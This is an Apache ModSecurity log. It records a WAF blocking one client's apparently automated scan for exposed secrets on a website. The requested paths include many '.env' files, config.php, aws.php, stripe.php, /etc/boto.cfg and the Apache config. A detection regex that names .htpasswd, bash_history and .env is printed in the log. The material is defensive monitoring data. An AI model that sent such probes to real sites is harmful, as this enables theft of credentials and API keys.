[Tue May 26 15:15:33.760301 2026] [security2:error] [pid 700087:tid 700248] [client 195.178.110.199:37316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_qQAAAB8"]
[Tue May 26 15:15:33.811842 2026] [security2:error] [pid 700087:tid 700293] [client 195.178.110.199:37382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/aws.php"] [unique_id "ahVrvZPHQM4as9fEIIZ_rQAAAEw"]
[Tue May 26 15:15:33.887151 2026] [security2:error] [pid 700087:tid 700262] [client 195.178.110.199:37316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/config.inc.php"] [unique_id "ahVrvZPHQM4as9fEIIZ_sAAAAC0"]
[Tue May 26 15:15:33.919055 2026] [security2:error] [pid 700087:tid 700316] [client 195.178.110.199:37346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/config.php"] [unique_id "ahVrvZPHQM4as9fEIIZ_sgAAAGM"]
[Tue May 26 15:15:33.921905 2026] [security2:error] [pid 700087:tid 700243] [client 195.178.110.199:60238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cms/.env"] [unique_id "ahVrvZPHQM4as9fEIIZ_swAAABo"]
[Tue May 26 15:15:34.073162 2026] [security2:error] [pid 700087:tid 700329] [client 195.178.110.199:37362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/module.config.php"] [unique_id "ahVrvpPHQM4as9fEIIZ_ugAAAHA"]
[Tue May 26 15:15:34.194321 2026] [security2:error] [pid 700087:tid 700322] [client 195.178.110.199:37266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/env.php"] [unique_id "ahVrvpPHQM4as9fEIIZ_wAAAAGk"]
[Tue May 26 15:15:34.347260 2026] [security2:error] [pid 700087:tid 700261] [client 195.178.110.199:37278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/nexmo.php"] [unique_id "ahVrvpPHQM4as9fEIIZ_0AAAACw"]
[Tue May 26 15:15:35.317892 2026] [security2:error] [pid 700087:tid 700245] [client 195.178.110.199:60240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config.php"] [unique_id "ahVrv5PHQM4as9fEIIZ_7wAAABw"]
[Tue May 26 15:15:35.426578 2026] [security2:error] [pid 700087:tid 700335] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrvpPHQM4as9fEIIZ_5AAAAHY"]
[Tue May 26 15:15:35.504262 2026] [security2:error] [pid 700087:tid 700289] [client 186.19.22.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahVrvpPHQM4as9fEIIZ_4QAAAEg"]
[Tue May 26 15:15:36.509311 2026] [security2:error] [pid 700087:tid 700250] [client 195.178.110.199:60202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/stripe.php"] [unique_id "ahVrwJPHQM4as9fEIIaAFgAAACE"]
[Tue May 26 15:15:36.778823 2026] [security2:error] [pid 700087:tid 700333] [client 195.178.110.199:37344] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/crm/.env"] [unique_id "ahVrwJPHQM4as9fEIIaAJwAAAHQ"]
[Tue May 26 15:15:36.798735 2026] [security2:error] [pid 700087:tid 700306] [client 195.178.110.199:60242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/current/.env"] [unique_id "ahVrwJPHQM4as9fEIIaAKAAAAFk"]
[Tue May 26 15:15:36.841060 2026] [security2:error] [pid 700087:tid 700217] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/demo/.env"] [unique_id "ahVrwJPHQM4as9fEIIaAKwAAAAA"]
[Tue May 26 15:15:36.850875 2026] [security2:error] [pid 700087:tid 700299] [client 195.178.110.199:60192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dev/.env"] [unique_id "ahVrwJPHQM4as9fEIIaALAAAAFI"]
[Tue May 26 15:15:36.857859 2026] [security2:error] [pid 700087:tid 700234] [client 195.178.110.199:60238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/developer/.env"] [unique_id "ahVrwJPHQM4as9fEIIaALQAAABE"]
[Tue May 26 15:15:36.967140 2026] [security2:error] [pid 700087:tid 700336] [client 195.178.110.199:60176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cron/.env"] [unique_id "ahVrwJPHQM4as9fEIIaAOAAAAHc"]
[Tue May 26 15:15:37.045859 2026] [security2:error] [pid 700087:tid 700309] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/develop/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAPgAAAFw"]
[Tue May 26 15:15:37.097061 2026] [security2:error] [pid 700087:tid 700273] [client 195.178.110.199:60176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/development/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAQAAAADg"]
[Tue May 26 15:15:37.097098 2026] [cgid:error] [pid 700087:tid 700267] [client 195.178.110.199:60228] AH01264: stderr from /home1/pronuyyv/public_html/dnscfg.cgi: script not found or unable to stat
[Tue May 26 15:15:37.318320 2026] [security2:error] [pid 700087:tid 700230] [client 195.178.110.199:60192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/erp/.env"] [unique_id "ahVrwZPHQM4as9fEIIaATAAAAA0"]
[Tue May 26 15:15:37.558289 2026] [security2:error] [pid 700087:tid 700277] [client 195.178.110.199:60224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVrwZPHQM4as9fEIIaAXAAAADw"]
[Tue May 26 15:15:37.562933 2026] [security2:error] [pid 700087:tid 700318] [client 195.178.110.199:60216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/front/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAXQAAAGU"]
[Tue May 26 15:15:37.566290 2026] [security2:error] [pid 700087:tid 700242] [client 195.178.110.199:60238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/boto.cfg"] [unique_id "ahVrwZPHQM4as9fEIIaAXgAAABk"]
[Tue May 26 15:15:37.587685 2026] [security2:error] [pid 700087:tid 700307] [client 195.178.110.199:60190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/frontend/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAXwAAAFo"]
[Tue May 26 15:15:37.646637 2026] [security2:error] [pid 700087:tid 700340] [client 195.178.110.199:37344] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fe/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAaAAAAHs"]
[Tue May 26 15:15:37.662409 2026] [security2:error] [pid 700087:tid 700282] [client 104.28.119.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVrwJPHQM4as9fEIIaABAAAAEE"]
[Tue May 26 15:15:37.716678 2026] [security2:error] [pid 700087:tid 700240] [client 195.178.110.199:60190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/info.php"] [unique_id "ahVrwZPHQM4as9fEIIaAcQAAABc"]
[Tue May 26 15:15:37.719137 2026] [security2:error] [pid 700087:tid 700276] [client 195.178.110.199:37230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/infophp.php"] [unique_id "ahVrwZPHQM4as9fEIIaAcgAAADs"]
[Tue May 26 15:15:37.816967 2026] [security2:error] [pid 700087:tid 700261] [client 195.178.110.199:60228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAeAAAACw"]
[Tue May 26 15:15:37.830631 2026] [security2:error] [pid 700087:tid 700241] [client 195.178.110.199:60238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lms/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAeQAAABg"]
[Tue May 26 15:15:37.944276 2026] [security2:error] [pid 700087:tid 700321] [client 195.178.110.199:60228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/market/.env"] [unique_id "ahVrwZPHQM4as9fEIIaAgQAAAGg"]
[Tue May 26 15:15:37.981382 2026] [security2:error] [pid 700087:tid 700234] [client 195.178.110.199:60238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/infos.php"] [unique_id "ahVrwZPHQM4as9fEIIaAggAAABE"]
[Tue May 26 15:15:38.136726 2026] [security2:error] [pid 700087:tid 700274] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrwZPHQM4as9fEIIaAbgAAADk"]
[Tue May 26 15:15:38.170885 2026] [security2:error] [pid 700087:tid 700296] [client 195.178.110.199:60176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/local/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAjgAAAE8"]
[Tue May 26 15:15:38.181571 2026] [security2:error] [pid 700087:tid 700273] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/new/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAjwAAADg"]
[Tue May 26 15:15:38.183972 2026] [security2:error] [pid 700087:tid 700267] [client 195.178.110.199:60208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node-api/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAkQAAADI"]
[Tue May 26 15:15:38.207737 2026] [security2:error] [pid 700087:tid 700251] [client 195.178.110.199:37344] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAlwAAACI"]
[Tue May 26 15:15:38.245668 2026] [security2:error] [pid 700087:tid 700243] [client 195.178.110.199:60278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node/api/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAmAAAABo"]
[Tue May 26 15:15:38.268685 2026] [security2:error] [pid 700087:tid 700232] [client 195.178.110.199:60270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/marketing/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAmQAAAA8"]
[Tue May 26 15:15:38.294810 2026] [security2:error] [pid 700087:tid 700221] [client 195.178.110.199:60258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node/backend/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAmwAAAAQ"]
[Tue May 26 15:15:38.295780 2026] [security2:error] [pid 700087:tid 700330] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nodeapi/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAnAAAAHE"]
[Tue May 26 15:15:38.308144 2026] [security2:error] [pid 700087:tid 700231] [client 195.178.110.199:60322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/media/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAnQAAAA4"]
